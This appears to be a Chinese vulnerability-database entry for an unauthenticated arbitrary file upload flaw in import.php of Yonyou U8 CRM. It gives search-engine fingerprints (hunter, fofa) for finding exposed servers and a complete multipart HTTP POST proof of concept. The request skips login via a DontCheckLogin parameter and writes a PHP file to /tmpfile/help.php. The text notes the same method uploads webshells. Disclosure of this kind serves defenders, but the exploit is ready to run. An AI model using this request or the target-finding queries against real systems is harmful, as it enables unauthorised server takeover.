用友CRM客户关系管理系统import.php存在任意文件上传漏洞

日期: 2024-07-19 | 影响软件: 用友CRM客户关系管理系统 | POC: 已公开

漏洞描述

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件，旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统import.php文件存在任意文件上传和任意文件读取漏洞，攻击者通过漏洞可以获取到服务器权限。

PoC代码

# 用友CRM客户关系管理系统import.php存在任意文件上传漏洞



用友CRM客户关系管理系统import.php存在任意文件上传漏洞，未经身份验证的攻击者通过漏洞上传webshell文件，从而获取到服务器权限。



## hunter



```yaml

app.name="用友 CRM"

```



## fofa



```yaml

body="用友U8CRM"

```



## poc



```yaml

POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Content-Length: 277

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5

Upgrade-Insecure-Requests: 1



------WebKitFormBoundarye0z8QbHs79gL8vW5

Content-Disposition: form-data; name="xfile"; filename="11.xls"



<?php phpinfo();?>

------WebKitFormBoundarye0z8QbHs79gL8vW5

Content-Disposition: form-data; name="combo"



help.php

------WebKitFormBoundarye0z8QbHs79gL8vW5--

```



![image-20240719191343917](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191913006.png)



文件路径：`http://ip/tmpfile/help.php`

漏洞描述

PoC代码

相关漏洞推荐

用友CRM客户关系管理系统 help.php 文件读取漏洞 无POC

用友CRM客户关系管理系统 import.php 任意文件上传漏洞 无POC

yonyou-crm-import-php-fileupload: 用友CRM客户关系管理系统任意文件上传漏洞 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

用友CRM客户关系管理系统 help.php 文件读取漏洞无POC

用友CRM客户关系管理系统 import.php 任意文件上传漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC